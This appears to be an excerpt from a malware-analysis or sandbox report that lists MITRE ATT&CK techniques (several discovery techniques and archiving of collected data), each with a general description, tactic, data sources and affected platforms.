Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre